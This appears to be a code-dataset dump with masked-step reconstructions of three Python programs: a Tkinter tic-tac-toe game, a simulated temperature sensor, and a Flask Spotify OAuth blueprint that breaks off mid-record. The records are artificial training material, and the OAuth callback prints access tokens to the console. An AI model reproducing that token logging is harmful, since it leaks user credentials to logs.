self.choose_one_window.update()
self.choose_one_window.deiconify()
def button_function(self, i, j):
if self.player_play(i, j):
self.judge()
self.computer_play()
self.judge()
def set_O_or_X(self, use):
self.player = use
if use == 'X':
self.computer = 'O'
self.computer_play()
else:
self.computer = 'X'
self.dominance = self.player
self.choose_one_window.withdraw()
self.main_game_window.update()
self.main_game_window.deiconify()
def create_choose_one_window(self):
self.choose_one_window = tk.Toplevel(self.main_game_window)
self.choose_one_window.title('choose one window')
self.choose_one_window.geometry('500x500')
choose_one_window_billboard = tk.StringVar(
master=self.choose_one_window, value='Choose you want')
use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,
height=5, textvariable=choose_one_window_billboard)
use_O_or_X.pack()
use_O = tk.Button(self.choose_one_window, text='I want use O', width=40,
height=5, command=partial(self.set_O_or_X, 'O'))
use_O.pack()
use_X = tk.Button(self.choose_one_window, text='I want use X', width=40,
height=5, command=partial(self.set_O_or_X, 'X'))
use_X.pack()
if __name__ == '__main__':
game = SingleMode()
|
normal
|
{
"blob_id": "841743d4e9d683827962d83a77a87c6432842add",
"index": 8013,
"step-1": "<mask token>\n\n\nclass SingleMode(NinePalaceGame):\n <mask token>\n <mask token>\n <mask token>\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n <mask token>\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n <mask token>\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n choose_one_window_billboard = tk.StringVar(master=self.\n choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n use_O = tk.Button(self.choose_one_window, text='I want use O',\n width=40, height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X',\n width=40, height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass SingleMode(NinePalaceGame):\n <mask token>\n <mask token>\n <mask token>\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n <mask token>\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n\n def set_O_or_X(self, use):\n self.player = use\n if use == 'X':\n self.computer = 'O'\n self.computer_play()\n else:\n self.computer = 'X'\n self.dominance = self.player\n self.choose_one_window.withdraw()\n self.main_game_window.update()\n self.main_game_window.deiconify()\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n choose_one_window_billboard = tk.StringVar(master=self.\n choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n use_O = tk.Button(self.choose_one_window, text='I want use O',\n width=40, height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X',\n width=40, height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass SingleMode(NinePalaceGame):\n <mask token>\n <mask token>\n\n def __init__(self):\n self.create_choose_one_window()\n super().__init__()\n self.main_game_window.mainloop()\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n\n def judge(self):\n if self.check_win(self.player):\n self.game_is_over = 1\n self.billboard_value.set('Player is win!')\n elif self.check_win(self.computer):\n self.game_is_over = 1\n self.billboard_value.set('Computer is win!')\n elif self.check_game_over():\n self.game_is_over = 1\n self.billboard_value.set('Game over!')\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n\n def set_O_or_X(self, use):\n self.player = use\n if use == 'X':\n self.computer = 'O'\n self.computer_play()\n else:\n self.computer = 'X'\n self.dominance = self.player\n self.choose_one_window.withdraw()\n self.main_game_window.update()\n self.main_game_window.deiconify()\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n choose_one_window_billboard = tk.StringVar(master=self.\n choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n use_O = tk.Button(self.choose_one_window, text='I want use O',\n width=40, height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X',\n width=40, height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass SingleMode(NinePalaceGame):\n player1 = player = 'O'\n player2 = computer = 'X'\n\n def __init__(self):\n self.create_choose_one_window()\n super().__init__()\n self.main_game_window.mainloop()\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n\n def judge(self):\n if self.check_win(self.player):\n self.game_is_over = 1\n self.billboard_value.set('Player is win!')\n elif self.check_win(self.computer):\n self.game_is_over = 1\n self.billboard_value.set('Computer is win!')\n elif self.check_game_over():\n self.game_is_over = 1\n self.billboard_value.set('Game over!')\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [[0, 0, 0], [0, 0, 0], [0, 0, 0]]\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n\n def set_O_or_X(self, use):\n self.player = use\n if use == 'X':\n self.computer = 'O'\n self.computer_play()\n else:\n self.computer = 'X'\n self.dominance = self.player\n self.choose_one_window.withdraw()\n self.main_game_window.update()\n self.main_game_window.deiconify()\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n choose_one_window_billboard = tk.StringVar(master=self.\n choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n use_O = tk.Button(self.choose_one_window, text='I want use O',\n width=40, height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X',\n width=40, height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\nif __name__ == '__main__':\n game = SingleMode()\n",
"step-5": "import tkinter as tk\nfrom functools import partial\nfrom numpy import random\nfrom base import NinePalaceGame\n\n\nclass SingleMode(NinePalaceGame):\n player1 = player = 'O'\n player2 = computer = 'X'\n\n def __init__(self):\n self.create_choose_one_window()\n super().__init__()\n\n self.main_game_window.mainloop()\n\n def player_play(self, i, j):\n if not self.game_is_over and not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.dominance)\n self.dominance = self.computer\n return 1\n return 0\n\n def computer_play(self):\n if not self.game_is_over:\n while 1:\n i, j = random.choice(range(3)), random.choice(range(3))\n if not self.box[i][j]:\n self.box[i][j] = 1\n self.value_group[i][j].set(self.computer)\n self.dominance = self.player\n break\n\n def judge(self):\n if self.check_win(self.player):\n self.game_is_over = 1\n self.billboard_value.set('Player is win!')\n elif self.check_win(self.computer):\n self.game_is_over = 1\n self.billboard_value.set('Computer is win!')\n elif self.check_game_over():\n self.game_is_over = 1\n self.billboard_value.set('Game over!')\n\n def reset(self):\n super().reset()\n self.dominance = self.player\n self.box = [\n [0, 0, 0], [0, 0, 0], [0, 0, 0]]\n\n self.main_game_window.withdraw()\n self.choose_one_window.update()\n self.choose_one_window.deiconify()\n\n def button_function(self, i, j):\n if self.player_play(i, j):\n self.judge()\n self.computer_play()\n self.judge()\n\n def set_O_or_X(self, use):\n self.player = use\n if use == 'X':\n self.computer = 'O'\n self.computer_play()\n else:\n self.computer = 'X'\n self.dominance = self.player\n self.choose_one_window.withdraw()\n self.main_game_window.update()\n self.main_game_window.deiconify()\n\n def create_choose_one_window(self):\n self.choose_one_window = tk.Toplevel(self.main_game_window)\n self.choose_one_window.title('choose one window')\n self.choose_one_window.geometry('500x500')\n\n choose_one_window_billboard = tk.StringVar(\n master=self.choose_one_window, value='Choose you want')\n use_O_or_X = tk.Label(self.choose_one_window, bg='yellow', width=50,\n height=5, textvariable=choose_one_window_billboard)\n use_O_or_X.pack()\n\n use_O = tk.Button(self.choose_one_window, text='I want use O', width=40,\n height=5, command=partial(self.set_O_or_X, 'O'))\n use_O.pack()\n use_X = tk.Button(self.choose_one_window, text='I want use X', width=40,\n height=5, command=partial(self.set_O_or_X, 'X'))\n use_X.pack()\n\n\nif __name__ == '__main__':\n game = SingleMode()\n",
"step-ids": [
6,
7,
9,
11,
13
]
}
|
[
6,
7,
9,
11,
13
] |
from random import random
import numpy as np
class TemperatureSensor:
sensor_type = "temperature"
unit="celsius"
instance_id="283h62gsj"
#initialisation
def __init__(self, average_temperature, temperature_variation, min_temperature, max_temperature):
self.average_temperature = average_temperature
self.temperature_variation = temperature_variation
self.min_temperature = min_temperature
self.max_temperature= max_temperature
self.value = 0.0 #initialise current temp value
#sensing
def sense(self):
#self.value = self.value + self.simple_random()
self.value = self.complex_random() + self.noise()
return self.value
#noise
def noise(self):
self.noise_value = np.random.normal(0,1)
return self.noise_value
#helper function for generating values with min temp as its base
def simple_random(self):
value = self.min_temperature + (random() * (self.max_temperature - self.min_temperature)) #so that it is in the range
return value
def complex_random(self):
value = self.average_temperature * (1 + (self.temperature_variation/100) * (1 * random() -1))
value = max(value,self.min_temperature)
value = min(value,self.max_temperature)
return value
#creating instance of sensor
ts = TemperatureSensor(25,10,16,35)
|
normal
|
{
"blob_id": "bc890f0f40a7e9c916628d491e473b5ecfa9bb9b",
"index": 740,
"step-1": "<mask token>\n\n\nclass TemperatureSensor:\n <mask token>\n <mask token>\n <mask token>\n\n def __init__(self, average_temperature, temperature_variation,\n min_temperature, max_temperature):\n self.average_temperature = average_temperature\n self.temperature_variation = temperature_variation\n self.min_temperature = min_temperature\n self.max_temperature = max_temperature\n self.value = 0.0\n <mask token>\n\n def noise(self):\n self.noise_value = np.random.normal(0, 1)\n return self.noise_value\n\n def simple_random(self):\n value = self.min_temperature + random() * (self.max_temperature -\n self.min_temperature)\n return value\n\n def complex_random(self):\n value = self.average_temperature * (1 + self.temperature_variation /\n 100 * (1 * random() - 1))\n value = max(value, self.min_temperature)\n value = min(value, self.max_temperature)\n return value\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TemperatureSensor:\n sensor_type = 'temperature'\n unit = 'celsius'\n instance_id = '283h62gsj'\n\n def __init__(self, average_temperature, temperature_variation,\n min_temperature, max_temperature):\n self.average_temperature = average_temperature\n self.temperature_variation = temperature_variation\n self.min_temperature = min_temperature\n self.max_temperature = max_temperature\n self.value = 0.0\n\n def sense(self):\n self.value = self.complex_random() + self.noise()\n return self.value\n\n def noise(self):\n self.noise_value = np.random.normal(0, 1)\n return self.noise_value\n\n def simple_random(self):\n value = self.min_temperature + random() * (self.max_temperature -\n self.min_temperature)\n return value\n\n def complex_random(self):\n value = self.average_temperature * (1 + self.temperature_variation /\n 100 * (1 * random() - 1))\n value = max(value, self.min_temperature)\n value = min(value, self.max_temperature)\n return value\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TemperatureSensor:\n sensor_type = 'temperature'\n unit = 'celsius'\n instance_id = '283h62gsj'\n\n def __init__(self, average_temperature, temperature_variation,\n min_temperature, max_temperature):\n self.average_temperature = average_temperature\n self.temperature_variation = temperature_variation\n self.min_temperature = min_temperature\n self.max_temperature = max_temperature\n self.value = 0.0\n\n def sense(self):\n self.value = self.complex_random() + self.noise()\n return self.value\n\n def noise(self):\n self.noise_value = np.random.normal(0, 1)\n return self.noise_value\n\n def simple_random(self):\n value = self.min_temperature + random() * (self.max_temperature -\n self.min_temperature)\n return value\n\n def complex_random(self):\n value = self.average_temperature * (1 + self.temperature_variation /\n 100 * (1 * random() - 1))\n value = max(value, self.min_temperature)\n value = min(value, self.max_temperature)\n return value\n\n\nts = TemperatureSensor(25, 10, 16, 35)\n",
"step-4": "from random import random\nimport numpy as np\n\n\nclass TemperatureSensor:\n sensor_type = 'temperature'\n unit = 'celsius'\n instance_id = '283h62gsj'\n\n def __init__(self, average_temperature, temperature_variation,\n min_temperature, max_temperature):\n self.average_temperature = average_temperature\n self.temperature_variation = temperature_variation\n self.min_temperature = min_temperature\n self.max_temperature = max_temperature\n self.value = 0.0\n\n def sense(self):\n self.value = self.complex_random() + self.noise()\n return self.value\n\n def noise(self):\n self.noise_value = np.random.normal(0, 1)\n return self.noise_value\n\n def simple_random(self):\n value = self.min_temperature + random() * (self.max_temperature -\n self.min_temperature)\n return value\n\n def complex_random(self):\n value = self.average_temperature * (1 + self.temperature_variation /\n 100 * (1 * random() - 1))\n value = max(value, self.min_temperature)\n value = min(value, self.max_temperature)\n return value\n\n\nts = TemperatureSensor(25, 10, 16, 35)\n",
"step-5": "from random import random\r\n\r\nimport numpy as np\r\n\r\nclass TemperatureSensor:\r\n sensor_type = \"temperature\"\r\n unit=\"celsius\"\r\n instance_id=\"283h62gsj\"\r\n \r\n #initialisation\r\n \r\n def __init__(self, average_temperature, temperature_variation, min_temperature, max_temperature):\r\n self.average_temperature = average_temperature\r\n self.temperature_variation = temperature_variation\r\n self.min_temperature = min_temperature \r\n self.max_temperature= max_temperature\r\n self.value = 0.0 #initialise current temp value\r\n \r\n #sensing \r\n def sense(self):\r\n #self.value = self.value + self.simple_random()\r\n self.value = self.complex_random() + self.noise()\r\n return self.value\r\n \r\n #noise\r\n def noise(self):\r\n self.noise_value = np.random.normal(0,1)\r\n return self.noise_value\r\n \r\n #helper function for generating values with min temp as its base\r\n def simple_random(self):\r\n value = self.min_temperature + (random() * (self.max_temperature - self.min_temperature)) #so that it is in the range\r\n return value\r\n \r\n def complex_random(self):\r\n value = self.average_temperature * (1 + (self.temperature_variation/100) * (1 * random() -1))\r\n value = max(value,self.min_temperature)\r\n value = min(value,self.max_temperature)\r\n return value\r\n \r\n#creating instance of sensor\r\nts = TemperatureSensor(25,10,16,35)\r\n\r\n",
"step-ids": [
5,
7,
8,
9,
10
]
}
|
[
5,
7,
8,
9,
10
] |
import os
import base64
from urllib.parse import urlencode
import json
from flask import Blueprint, request, redirect, jsonify, make_response
import requests
spotify = Blueprint('spotify', __name__)
# Client Keys
SPOTIFY_CLIENT_ID = os.environ.get('SPOTIFY_CLIENT_ID')
SPOTIFY_CLIENT_SECRET = os.environ.get('SPOTIFY_CLIENT_SECRET')
# Spotify URLS
SPOTIFY_AUTH_URL = "https://accounts.spotify.com/authorize"
SPOTIFY_TOKEN_URL = "https://accounts.spotify.com/api/token"
SPOTIFY_API_BASE_URL = "https://api.spotify.com"
API_VERSION = "v1"
SPOTIFY_API_URL = "{}/{}".format(SPOTIFY_API_BASE_URL, API_VERSION)
# Server-side Parameters
CLIENT_SIDE_URL = "http://localhost"
PORT = 8888
REDIRECT_URI = "{}:{}/callback".format(CLIENT_SIDE_URL, PORT)
SCOPE = "playlist-modify-public playlist-modify-private user-read-currently-playing"
STATE = ""
SHOW_DIALOG_BOOL = True
SHOW_DIALOG_STR = str(SHOW_DIALOG_BOOL).lower()
auth_query_parameters = {
"response_type": "code",
"redirect_uri": REDIRECT_URI,
"scope": SCOPE,
# "state": STATE,
# "show_dialog": SHOW_DIALOG_str,
"client_id": SPOTIFY_CLIENT_ID
}
@spotify.route("/login")
def login():
# Auth Step 1: Authorization
url_args = urlencode(auth_query_parameters)
print(url_args)
auth_url = "{}/?{}".format(SPOTIFY_AUTH_URL, url_args)
return redirect(auth_url)
@spotify.route("/callback")
def callback():
# Auth Step 4: Requests refresh and access tokens
auth_code = request.args['code']
code_payload = {
"grant_type": "authorization_code",
"code": str(auth_code),
"redirect_uri": REDIRECT_URI
}
base64encoded = base64.b64encode(bytes("{}:{}".format(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET), 'utf-8'))
headers = {"Authorization": "Basic {}".format(base64encoded.decode('utf-8'))}
post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload, headers=headers)
# Auth Step 5: Tokens are Returned to Application
response_data = json.loads(post_request.text)
access_token = response_data["access_token"]
print(access_token)
refresh_token = response_data["refresh_token"]
token_type = response_data["token_type"]
expires_in = response_data["expires_in"]
redirect_to_index = redirect("http://localhost:3000/")
response = make_response(redirect_to_index)
response.set_cookie('access_token', value=access_token)
response.set_cookie('refresh_token', value=refresh_token)
return response
@spotify.route("/refresh_token", methods=['POST'])
def refresh_token():
# 7. Requesting access token from refresh token
r = request.get_json()
refresh_token = r['refresh_token']
code_payload = {
"grant_type": "refresh_token",
"refresh_token": refresh_token
}
base64encoded = base64.b64encode(bytes("{}:{}".format(SPOTIFY_CLIENT_ID, SPOTIFY_CLIENT_SECRET), 'utf-8'))
headers = {"Authorization": "Basic {}".format(base64encoded.decode('utf-8'))}
post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload, headers=headers)
response_data = json.loads(post_request.text)
return jsonify(response_data)
|
normal
|
{
"blob_id": "f080191fec4e56adc4013da74c840817e88caf56",
"index": 869,
"step-1": "<mask token>\n\n\[email protected]('/callback')\ndef callback():\n auth_code = request.args['code']\n code_payload = {'grant_type': 'authorization_code', 'code': str(\n auth_code), 'redirect_uri': REDIRECT_URI}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n access_token = response_data['access_token']\n print(access_token)\n refresh_token = response_data['refresh_token']\n token_type = response_data['token_type']\n expires_in = response_data['expires_in']\n redirect_to_index = redirect('http://localhost:3000/')\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected]('/refresh_token', methods=['POST'])\ndef refresh_token():\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {'grant_type': 'refresh_token', 'refresh_token':\n refresh_token}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-2": "<mask token>\n\n\[email protected]('/login')\ndef login():\n url_args = urlencode(auth_query_parameters)\n print(url_args)\n auth_url = '{}/?{}'.format(SPOTIFY_AUTH_URL, url_args)\n return redirect(auth_url)\n\n\[email protected]('/callback')\ndef callback():\n auth_code = request.args['code']\n code_payload = {'grant_type': 'authorization_code', 'code': str(\n auth_code), 'redirect_uri': REDIRECT_URI}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n access_token = response_data['access_token']\n print(access_token)\n refresh_token = response_data['refresh_token']\n token_type = response_data['token_type']\n expires_in = response_data['expires_in']\n redirect_to_index = redirect('http://localhost:3000/')\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected]('/refresh_token', methods=['POST'])\ndef refresh_token():\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {'grant_type': 'refresh_token', 'refresh_token':\n refresh_token}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-3": "<mask token>\nspotify = Blueprint('spotify', __name__)\nSPOTIFY_CLIENT_ID = os.environ.get('SPOTIFY_CLIENT_ID')\nSPOTIFY_CLIENT_SECRET = os.environ.get('SPOTIFY_CLIENT_SECRET')\nSPOTIFY_AUTH_URL = 'https://accounts.spotify.com/authorize'\nSPOTIFY_TOKEN_URL = 'https://accounts.spotify.com/api/token'\nSPOTIFY_API_BASE_URL = 'https://api.spotify.com'\nAPI_VERSION = 'v1'\nSPOTIFY_API_URL = '{}/{}'.format(SPOTIFY_API_BASE_URL, API_VERSION)\nCLIENT_SIDE_URL = 'http://localhost'\nPORT = 8888\nREDIRECT_URI = '{}:{}/callback'.format(CLIENT_SIDE_URL, PORT)\nSCOPE = (\n 'playlist-modify-public playlist-modify-private user-read-currently-playing'\n )\nSTATE = ''\nSHOW_DIALOG_BOOL = True\nSHOW_DIALOG_STR = str(SHOW_DIALOG_BOOL).lower()\nauth_query_parameters = {'response_type': 'code', 'redirect_uri':\n REDIRECT_URI, 'scope': SCOPE, 'client_id': SPOTIFY_CLIENT_ID}\n\n\[email protected]('/login')\ndef login():\n url_args = urlencode(auth_query_parameters)\n print(url_args)\n auth_url = '{}/?{}'.format(SPOTIFY_AUTH_URL, url_args)\n return redirect(auth_url)\n\n\[email protected]('/callback')\ndef callback():\n auth_code = request.args['code']\n code_payload = {'grant_type': 'authorization_code', 'code': str(\n auth_code), 'redirect_uri': REDIRECT_URI}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n access_token = response_data['access_token']\n print(access_token)\n refresh_token = response_data['refresh_token']\n token_type = response_data['token_type']\n expires_in = response_data['expires_in']\n redirect_to_index = redirect('http://localhost:3000/')\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected]('/refresh_token', methods=['POST'])\ndef refresh_token():\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {'grant_type': 'refresh_token', 'refresh_token':\n refresh_token}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-4": "import os\nimport base64\nfrom urllib.parse import urlencode\nimport json\nfrom flask import Blueprint, request, redirect, jsonify, make_response\nimport requests\nspotify = Blueprint('spotify', __name__)\nSPOTIFY_CLIENT_ID = os.environ.get('SPOTIFY_CLIENT_ID')\nSPOTIFY_CLIENT_SECRET = os.environ.get('SPOTIFY_CLIENT_SECRET')\nSPOTIFY_AUTH_URL = 'https://accounts.spotify.com/authorize'\nSPOTIFY_TOKEN_URL = 'https://accounts.spotify.com/api/token'\nSPOTIFY_API_BASE_URL = 'https://api.spotify.com'\nAPI_VERSION = 'v1'\nSPOTIFY_API_URL = '{}/{}'.format(SPOTIFY_API_BASE_URL, API_VERSION)\nCLIENT_SIDE_URL = 'http://localhost'\nPORT = 8888\nREDIRECT_URI = '{}:{}/callback'.format(CLIENT_SIDE_URL, PORT)\nSCOPE = (\n 'playlist-modify-public playlist-modify-private user-read-currently-playing'\n )\nSTATE = ''\nSHOW_DIALOG_BOOL = True\nSHOW_DIALOG_STR = str(SHOW_DIALOG_BOOL).lower()\nauth_query_parameters = {'response_type': 'code', 'redirect_uri':\n REDIRECT_URI, 'scope': SCOPE, 'client_id': SPOTIFY_CLIENT_ID}\n\n\[email protected]('/login')\ndef login():\n url_args = urlencode(auth_query_parameters)\n print(url_args)\n auth_url = '{}/?{}'.format(SPOTIFY_AUTH_URL, url_args)\n return redirect(auth_url)\n\n\[email protected]('/callback')\ndef callback():\n auth_code = request.args['code']\n code_payload = {'grant_type': 'authorization_code', 'code': str(\n auth_code), 'redirect_uri': REDIRECT_URI}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n access_token = response_data['access_token']\n print(access_token)\n refresh_token = response_data['refresh_token']\n token_type = response_data['token_type']\n expires_in = response_data['expires_in']\n redirect_to_index = redirect('http://localhost:3000/')\n response = make_response(redirect_to_index)\n response.set_cookie('access_token', value=access_token)\n response.set_cookie('refresh_token', value=refresh_token)\n return response\n\n\[email protected]('/refresh_token', methods=['POST'])\ndef refresh_token():\n r = request.get_json()\n refresh_token = r['refresh_token']\n code_payload = {'grant_type': 'refresh_token', 'refresh_token':\n refresh_token}\n base64encoded = base64.b64encode(bytes('{}:{}'.format(SPOTIFY_CLIENT_ID,\n SPOTIFY_CLIENT_SECRET), 'utf-8'))\n headers = {'Authorization': 'Basic {}'.format(base64encoded.decode(\n 'utf-8'))}\n post_request = requests.post(SPOTIFY_TOKEN_URL, data=code_payload,\n headers=headers)\n response_data = json.loads(post_request.text)\n return jsonify(response_data)\n",
"step-5": "import os\nimport base64\nfrom urllib.parse import urlencode\nimport json\n\nfrom flask import Blueprint, request, redirect, jsonify, make_response\nimport requests\n\nspotify = Blueprint('spotify', __name__)\n\n# Client Keys\nSPOTIFY_CLIENT_ID = os.environ.get('SPOTIFY_CLIENT_ID')\nSPOTIFY_CLIENT_SECRET = os.environ.get('SPOTIFY_CLIENT_SECRET')\n\n# Spotify URLS\nSPOTIFY_AUTH_URL = \"https://accounts.spotify.com/authorize\"\nSPOTIFY_TOKEN_URL = \"https://accounts.spotify.com/api/token\"\nSPOTIFY_API_BASE_URL = \"https://api.spotify.com\"\nAPI_VERSION = \"v1\"\nSPOTIFY_API_URL = \"{}/{}\".format(SPOTIFY_API_BASE_URL, API_VERSION)\n\n# Server-side Parameters\nCLIENT_SIDE_URL = \"http://localhost\"\nPORT = 8888\nREDIRECT_URI = \"{}:{}/callback\".format(CLIENT_SIDE_URL, PORT)\nSCOPE = \"playlist-modify-public playlist-modify-private user-read-currently-playing\"\nSTATE = \"\"\nSHOW_DIALOG_BOOL = True\nSHOW_DIALOG_STR = str(SHOW_DIALOG_BOOL).lower()\n\n\nauth_query_parameters = {\n \"response_type\": \"code\",\n \"redirect_uri\": REDIRECT_URI,\n \"scope\": SCOPE,\n # \"state\": STATE,\n # \"show_dialog\": SHOW_DIALOG_str,\n \"client_id\": SPOTIFY_CLIENT_ID\n}\n\n\[email protected](\"/login\")\ndef login():\n # Auth Step 1: Authorization\n url_args = urlencode(auth_query_parameters)\n print(url_args)\n auth_url = \"{}/?{}\".format(SPOTIFY_AUTH_URL, url_args)\n return redirect(auth_url)\n\n\[email protected](\"/callback\")\ndef 